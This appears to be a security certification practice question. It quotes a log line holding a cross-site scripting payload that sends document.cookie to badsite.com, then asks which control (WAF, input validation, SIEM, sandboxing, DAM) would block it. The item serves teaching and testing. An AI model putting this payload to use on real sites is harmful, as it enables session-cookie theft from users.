A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” +
request.getParameter(‘><script>document.location=’http://badsite.com/? q=’document.cookie</script>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?
A.
WAF
B.
Input validation
C.
SIEM
D.
Sandboxing
E.
DAM